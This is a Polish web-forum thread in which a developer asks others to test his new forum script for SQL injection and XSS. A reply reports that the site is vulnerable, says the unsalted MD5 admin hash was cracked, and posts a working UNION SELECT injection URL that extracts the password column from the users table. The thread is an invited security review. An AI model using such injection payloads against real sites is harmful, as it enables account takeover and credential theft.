![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 190 Pomógł: 2 Dołączył: 30.11.2009 Ostrzeżenie: (10%) ![]() ![]() |
Gdzieś 7 czerwca rozpocząłem pracę nad własnym skryptem forum.
Skrypt ma budowę strukturalną w 95%, te 5% jest to klasa MySQL oraz klasa szablonów. Cudów tam nie ma ale jak na 2tyg. pracy chyba nie jest źle. Proszę szukać błędów, sql inj, xss etc. Kod http://zenb.hostil.pl/index.php Hosting na razie jest jaki jest (troche wolny, niestabilny) ale jak skrypt będę rozwijać (mam taki zamiar) to się coś wybierze. Pozdro |
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 697 Pomógł: 47 Dołączył: 19.12.2003 Skąd: Lublin Ostrzeżenie: (0%) ![]() ![]() |
Strona dziurawa (IMG:style_emoticons/default/winksmiley.jpg) . Dokładniej podatna na SQL Injection oraz Blind SQL Injection. Złamanie jej zajęło mi 5 minut (IMG:style_emoticons/default/biggrin.gif) . Hasło typu xxx111 nie jest zbyt najtrudniejsze do złamania ;]. Pierwszy z brzegu słownik MD5 mi rozgryzł hash(czemu nie dodajesz soli?).
A tu działający kod (IMG:style_emoticons/default/smile.gif) Kod http://zenb.hostil.pl/user.php?module=view&user=32%20AND%201=0%20UNION%20SELECT%201,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20users%20-- W polu Strona WWW widać jak na dłoni hasło administratora (IMG:style_emoticons/default/winksmiley.jpg) . Pozdrawiam (IMG:style_emoticons/default/biggrin.gif) |
|
|
![]() ![]() |
![]() |
Aktualny czas: 4.10.2025 - 01:17 |